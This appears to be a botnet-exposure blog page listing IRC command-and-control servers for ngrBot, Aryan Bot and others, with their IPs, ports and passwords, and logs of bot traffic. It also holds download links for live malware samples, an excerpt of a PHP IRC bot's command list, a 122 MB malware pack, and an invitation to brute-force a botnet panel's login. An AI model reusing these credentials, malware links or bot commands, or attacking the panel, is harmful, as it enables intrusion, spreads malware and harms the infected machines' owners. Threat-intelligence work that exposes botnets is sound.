This is another contribution from our anonymous friend The sample here http://dl.dropbox.com/u/73806662/testandro.exe connects to img196-imageshack.us/pannel/image.php to have acces to this panel u need user:passwd here imageshack.us/pannel/ feel free to brute it 🙂 from virustotal scan the file testandro.exe apears to be FUD there is another file downloaded dl.dropbox.com/u/76205929/rk.cmd.dll wich from the name looks like rootkitRead more...
jers1.info(ngrBot hosted in Peru Datos)
Resolved : [jers1.info] To [208.83.233.195] C&C Server: 208.83.233.195:1889 Server Password: Username: wbunlkj Nickname: n{DE|XPa}wbunlkj Channel: #cpx (Password: nuifkr) Channeltopic: :~pu http://hotfile.com/dl/154232487/a95dd91/27abril.exe 4ad089d45ca43ecc9d99e93215e03f6f ~s -o ~s Downloaded url’s http://199.7.177.220/dl/154232490/3b415ce/jhgfrrr.exe (hotfile.com) hosting infos: http://whois.domaintools.com/208.83.233.195
3.aa.am(ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Resolved : [3.aa.am] To [80.82.66.234] Remote Host Port Number 3.aa.am 9835 Local users: Current Local Users: 710 Max: 1954 Global users: Current Global Users: 710 Max: 1954 NICK {US|XPa|x86}cxtrpuo USER {US|XPa|x86}cxtrpuo 0 0 :{US|XPa|x86}cxtrpuo JOIN #new JOIN #bull Now talking in #new Modes On: [ #new ] [ +sntl 75 ] Joins: {DE|W7a|x86}hssdpli [~DEW7ax8@nig-6B825AA6.superkabel.de] hostingRead more...
94.23.98.55(linux bots hosted in Spain Madrid Ovh Systems)
The bot used by heckers: <? /* * * #crew@corp. since 2003 * edited by: devil__ <admin@xdevil.org> * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dnsRead more...
128.204.202.111(ngrBot hosted in Netherlands Amsterdam Snel Internet Services B.v)
Remote Host Port Number 128.204.202.111 6667 PASS nopw NICK n{US|XPa}ubnrkxy USER ubnrkxy 0 0 :ubnrkxy PONG :92C7705D JOIN #ngr# ngrBot {NL|W7p}psvawzp) !v Quits: {NL|W7p}psvawzp [net-217320@E4422491.8D3F578B.324BA75E.IP] (User has been permanently banned from Codeleak (gtfo.)) lol snifers allready in The hecker runing this net (boing7898@rox-F8ED71C3.ip61.fastwebnet.it): Boing * ~#ngr# #codeleak * irc.codeleak.com :Codeleak’s IRC * is away (PlayingRead more...
122mb samples for analysing purposes
This package contains 122mb samples inside u have diferent irc bot samples(insomnia uncrypted),baking trojans,worms etc Only for analysing purposes Download Download Download
nbot.no-ip.biz(Aryan Bot hosted in Mexico Television Internacional S.a. De C.v)
Resolved : [nbot.no-ip.biz] To [187.161.215.20] Remote Host Port Number 187.161.215.20 6667 Local users: Current Local Users: 74 Max: 115 Global users: Current Global Users: 74 Max: 90 JOIN #bots none NICK New{US-XP-x86}7358801 USER 7358801 “” “7358801” :7358801 MODE New{US-XP-x86}7358801 +iMm PONG :4D23E0D9 PONG :nbot.no-ip.biz Now talking in #bots Modes On: [ #bots 12] [ +Read more...
gigasphere.su(irc botnet hosted in United States Baltimore Gandi Us Inc)
Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html Resolved : [gigasphere.su] To [61.31.99.67] Resolved : [gigasphere.su] To [82.165.135.196] Resolved : [gigasphere.su] To [173.246.102.122] Remote Host Port Number 61.31.99.67 4042 PASS ngrBot 61.31.99.67 1863 PASS ngrBot other ports used for ircd: 81,3333,1234,33333 NICK new[USA|XP|COMPUTERNAME]eejxdfy USER xd “” “lol” :xd Channels: Now talking in #boss Topic On: [ #bossRead more...
f.maqder.info(irc botnet hosted in United States Dallas Theplanet.com Internet Services Inc)
Resolved : [f.maqder.info] To [174.123.76.49] Remote Host Port Number 174.123.76.49 1863 PASS .. NICK SB-USA-XP-GgmPsYRi USER SB-USA-XP-GgmPsYRi 0 * f.maqder.info :SB-USA-XP-GgmPsYRi JOIN #sly ss Sample sample is .jpg so dont open the url in your browser and use vmware hosting infos: http://whois.domaintools.com/174.123.76.49
fasharlz.com(ngrBot hosted in United States Denver Wbs Connect)
Resolved : [fasharlz.com] To [8.33.7.91] Remote Host Port Number 174.140.174.50 80 199.15.234.7 80 62.149.142.23 80 8.33.7.91 8879 PASS secret NICK n{US|XPa}wjipllb USER wjipllb 0 0 :wjipllb JOIN #ircp secret PRIVMSG #ircp :[d=”http://www.lazynews.net/fashashogun.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s)Read more...